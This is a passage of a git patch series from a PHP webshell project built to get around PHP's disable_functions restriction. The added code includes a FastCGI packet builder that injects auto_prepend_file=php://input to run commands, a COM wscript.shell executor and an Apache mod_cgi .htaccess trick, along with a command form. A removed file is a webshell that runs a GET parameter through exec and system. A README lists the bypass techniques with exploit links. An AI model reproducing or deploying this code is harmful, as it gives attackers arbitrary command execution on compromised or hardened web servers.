len need < 40, will be fix."; + } + + $cmd = base64_encode($cmd); + $php_code = ''; + + $php_code_len = strlen($php_code); + $php_code_pad = p(($php_code_len >> 8) & 0xFF) . p($php_code_len & 0xFF) . p(0) . p(0); + + //$uri = bin2hex(__FILE__); + //$uri = '/var/www/html/shell.php'; + $uri = $file; + $uri_val_pad = pnv(strlen($uri)); + + $params = '0e02434f4e54454e545f4c454e475448'.bin2hex($php_code_len).'0c10434f4e54454e545f545950456170706c69636174696f6e2f746578740b0452454d4f54455f504f5254393938350b095345525645525f4e414d456c6f63616c686f7374110b474154455741595f494e54455246414345466173744347492f312e300f0e5345525645525f534f4654574152457068702f66636769636c69656e740b0952454d4f54455f414444523132372e302e302e310f'.$uri_val_pad.'5343524950545f46494c454e414d45'.bin2hex($uri).'0b'.$uri_val_pad.'5343524950545f4e414d45'.bin2hex($uri).'091f5048505f56414c55456175746f5f70726570656e645f66696c65203d207068703a2f2f696e7075740e04524551554553545f4d4554484f44504f53540b025345525645525f504f525438300f085345525645525f50524f544f434f4c485454502f312e310c0051554552595f535452494e470f165048505f41444d494e5f56414c5545616c6c6f775f75726c5f696e636c756465203d204f6e0d01444f43554d454e545f524f4f542f0b095345525645525f414444523132372e302e302e310b'.$uri_val_pad.'524551554553545f555249'.bin2hex($uri); + $params_len = strlen(hex2bin($params)); + $params_pad = p(($params_len >> 8) & 0xFF) . p($params_len & 0xFF) . p(0) . p(0); + + $fastcgi_data = '01017b0700080000000100000000000001047b07'.$params_pad.$params.'01047b070000000001057b07'.$php_code_pad.bin2hex($php_code).'01057b0700000000'; + + $result = send_socket(hex2bin($fastcgi_data), $host, $port); +// if($result != FAILURE){ +// $start = md5("s");; +// $end = md5("e");; +// $input = $result; +// $result = substr($input, strlen($start)+strpos($input, $start),(strlen($input) - strpos($input, $end))*(-1)); +// } + return $result; +} + +//var_dump(fastcgi_exec("id",'/var/www/html/shell.php' , '127.0.0.1', 9002)); +//echo fastcgi_exec("id",'/var/www/html/ant.php' , 'unix:///run/php/php7.3-fpm.sock'); +//var_dump(fastcgi_exec("whoami",'C:\\phpstudy2018\\PHPTutorial\\WWW\test\\apache\\1.php' , '127.0.0.1', 9000)); + +/* + * COM执行: 仅限windows + * work on: + * php 5.4.45 + * + * ******* + * fail: + * > php 5.5.38 + * + */ + +function com_exec($cmd){ + $cmd = "cmd.exe /c ".$cmd; + $cmd_arr = send_cmd($cmd); + + echo "执行时候会黑框, 需要时间; 如果有延时命令执行的时候特别需要注意一下。"; + + $wscript = new COM('wscript.shell'); + $wscript->Run($cmd_arr[0]); + + sleep(1); + return recv_result($cmd_arr[1]); +} + +//echo com_exec($_GET['cmd']); + +/* + * Apache mod-cgi: Windows && Linux + * 需要保证一个web目录可写可访问 + * + * 注意备份htaccess + */ + +function apache_cgi_exec($cmd, $dir='.'){ + echo "由于是系统调用cmd执行后命令,会有一些延迟。请新建目录执行, 以免htaccess出问题导致本身shell不可访问。"; + // check +// if(!in_array('mod_cgi', apache_get_modules()) && !empty($_SERVER['HTACCESS']) && is_writable($dir)){ +// return FAILURE; +// } + + $cmd_arr = send_cmd($cmd); + if(OS == "Windows") { + $shell_file = "bye.bat"; + $htaccess = "ScriptInterpreterSource Registry-Strict\nAddHandler cgi-script .bat\nOptions +ExecCGI +FollowSymlinks"; + + $cmd_arr[0] = escapeshellcmd($cmd_arr[0]); + $content = "@echo off\necho Content-Type: text/html\nfor /F %%i in ('$cmd_arr[0]') do ( set result=%%i)"; + } else { + $shell_file = "1.bylinux"; + $htaccess = "Options +ExecCGI\nAddHandler cgi-script .bylinux"; + $content = "#!/bin/bash\necho \"Content-Type: text/html\\n\\n\"\n" . $cmd_arr[0]; + } + + write_file('.htaccess', $htaccess); + write_file($shell_file, $content); + + echo ""; + sleep(1); + echo recv_result($cmd_arr[1]); +} + +//echo apache_cgi_exec($_GET['cmd']); + + +echo << +$disable_function_str

+ +Vulable Function:
+$vul_function_str

+ +Open Basedir:
+$open_basedir

+ +
+ execpath:

+ command:

+ writeable dir:

+

+
+ +EOF; + +//echo $_POST["cmd"]; + + +?> + diff --git a/test.php b/test.php new file mode 100644 index 0000000..ccda4df --- /dev/null +++ b/test.php @@ -0,0 +1,7 @@ + Date: Tue, 18 Jun 2019 11:23:05 +0800 Subject: [PATCH 11/16] Delete bypass.php del --- bypass.php | 70 ------------------------------------------------------ 1 file changed, 70 deletions(-) delete mode 100644 bypass.php diff --git a/bypass.php b/bypass.php deleted file mode 100644 index 4ccd481..0000000 --- a/bypass.php +++ /dev/null @@ -1,70 +0,0 @@ - $func enable", 1); - } - } -} else { - msg("disable_functions none !!!", 1); -} -function msg($text, $type = 0) { - - $def = "[*]"; - $color = "green"; - if ($type == 1) { - - $def = "[+]"; - $color = "red"; - } else if ($type == -1) { - - $def = "[-]"; - } - echo "$def $text
"; -} - -function Exec_Run($cmd) { - $res = ''; - if (function_exists('exec')) { - @exec($cmd, $res); - $res = join("\n", $res); - } elseif (function_exists('shell_exec')) { - $res = @shell_exec($cmd); - } elseif (function_exists('system')) { - @ob_start();@system($cmd); - $res = @ob_get_contents(); - @ob_end_clean(); - } elseif (function_exists('passthru')) { - @ob_start(); - @passthru($cmd); - $res = @ob_get_contents(); - @ob_end_clean(); - } elseif (@is_resource($f = @popen($cmd, "r"))) { - $res = ''; - while (!@feof($f)) {$res .= @fread($f, 1024);} - @pclose($f); - } - return $res; -} -function Exec_g() { - $res = '回显'; - $cmd = 'whoami'; - if (!empty($_GET['cmd'])) { - $cmd = $_GET['cmd']; - } - $res = Exec_Run($cmd); - print << - command >> {$cmd} - {$res} - -END; -} -Exec_g(); From dbf06972195f3a1ab1a63fae822ecea28a6b0716 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Tue, 18 Jun 2019 11:23:17 +0800 Subject: [PATCH 12/16] Delete ant.php del --- ant.php | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 ant.php diff --git a/ant.php b/ant.php deleted file mode 100644 index c7fe53f..0000000 --- a/ant.php +++ /dev/null @@ -1,7 +0,0 @@ - Date: Tue, 18 Jun 2019 11:23:26 +0800 Subject: [PATCH 13/16] Delete test.php del --- test.php | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 test.php diff --git a/test.php b/test.php deleted file mode 100644 index ccda4df..0000000 --- a/test.php +++ /dev/null @@ -1,7 +0,0 @@ - Date: Tue, 18 Jun 2019 11:29:42 +0800 Subject: [PATCH 14/16] add paper dir --- paper/readme.old.md | 77 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 paper/readme.old.md diff --git a/paper/readme.old.md b/paper/readme.old.md new file mode 100644 index 0000000..64a5ded --- /dev/null +++ b/paper/readme.old.md @@ -0,0 +1,77 @@ +# Bypass_Disable_functions_Shell +一个各种方式突破Disable_functions达到命令执行的shell + +### 防御 +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,mb_send_mail,putenv,ini_set,apache_setenv,symlink,link + +### 功能 +##### imap_open bypass +https://antichat.com/threads/463395/#post-4254681 + +##### 利用环境变量LD_PRELOAD来绕过 + +http://drops.wooyun.org/tips/16054 + +##### ImageMagick绕过 + +http://drops.wooyun.org/papers/15589 + +https://www.exploit-db.com/exploits/39766/ + +##### imagecreatefromgd2 + +https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074 + +##### test + +https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078 + +##### PHP OPcache + +http://www.myhack58.com/Article/html/3/62/2016/74160.htm + +http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ + +##### mail函数 + +https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html + +https://www.exploit-db.com/exploits/35146/ + +##### 利用pcntl_exec突破 + +http://www.cnseay.com/2632/comment-page-1/ + +``` +#exec.php + +#/tmp/b4dboy.sh +#!/bin/bash +ls -l / +``` + +##### 破壳bash漏洞 + +##### dl + +https://www.exploit-db.com/docs/38104.pdf + +##### PHP 5.x - COM functions safe_mode and disable_function bypass + +https://www.exploit-db.com/exploits/4553/ + +https://www.exploit-db.com/exploits/4517/ + +##### win_shell_execute + +https://www.exploit-db.com/exploits/4218/ + +##### Bypass PHP system functions disabled via mod_cgi + +http://0cx.cc/bypass_disabled_via_mod_cgi.jspx + +##### mail的exim扩展bypass +http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html + + + From 7de51d22aaee5ca2777b7b703a9625d84c44631a Mon Sep 17 00:00:00 2001 From: l3m0n Date: Tue, 18 Jun 2019 11:32:02 +0800 Subject: [PATCH 15/16] add old doc --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index a312b07..a59c4a3 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,7 @@ # Bypass Disable Functions Shell +项目旧文档已迁移到[此处](https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/paper/readme.old.md) + 禁用函数列表(希望能做最全的禁用列表,也可以用此做对比进行绕过): ``` From f4f0075bdec9a8c18c04e0ffdc0c958582b20526 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Tue, 18 Jun 2019 11:38:43 +0800 Subject: [PATCH 16/16] add bypass method --- README.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a59c4a3..29a5054 100644 --- a/README.md +++ b/README.md @@ -8,6 +8,14 @@ dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link ``` +shell绕过已实现的方式: +- 常规绕过: exec、shell_exec、system、passthru、popen、proc_open +- ld_preload绕过: mail、imap_mail、error_log、mb_send_mail +- pcntl_exec +- imap_open +- fastcgi +- com +- apache mod-cgi 目录结构: - env - docker环境, 用于测试各类绕过exp @@ -16,5 +24,3 @@ dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,ima - -